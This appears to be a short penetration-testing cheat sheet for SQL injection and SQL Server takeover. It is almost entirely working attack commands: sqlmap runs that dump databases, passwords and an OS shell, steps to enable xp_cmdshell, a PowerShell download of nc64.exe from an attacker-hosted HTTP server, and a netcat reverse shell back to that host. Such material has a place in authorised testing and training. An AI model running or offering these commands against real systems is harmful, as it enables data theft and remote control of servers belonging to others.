➤ Specify a DBMS
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbms Oracle
➤ Enumerate the database names
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbs
➤ Enumerate the tables
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D {DATABASE} --tables
➤ Enumerate the columns
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D {DATABASE} -T {TABLE} --columns
➤ Dump columns
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D {DATABASE} -T {TABLE} -C {COLUMN01, COLUMNS02...} --dump
➤ Get the operating system command shell
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --os-shell
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --os-cmd=whoami
➤ Try to detect and dump the passwords
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --passwords
sqsh -U <user> -P <password> -S <ip:port> -D <database>
ex: sqsh -U sa -P badpassword -S 10.0.0.1:1433 -D bankdb
Error: "SQL Server blocked access to proecedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can be enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online."
1> EXEC SP_CONFIGURE 'show advanced options',1
2> reconfigure
3> go
1> EXEC SP_CONFIGURE 'xp_cmdshell',1
2> reconfigure
3> go
1> xp_cmdshell 'whoami'
2> go
➤ Create a netcat listener
nc -lvp 443
➤ Create a reverse shell (here nc64.exe) and the http server
python3 -m http.server
➤ On the database, upload the file from the http server
1> exec xp_cmdshell "powershell.exe wget http://192.168.119.194:8000/nc64.exe -OutFile c:\Users\Public\nc64.exe"
2> go
➤ Execute the script
1> xp_cmdshell 'c:\Users\Public\nc64.exe -e cmd.exe 192.168.119.194 443'
2> go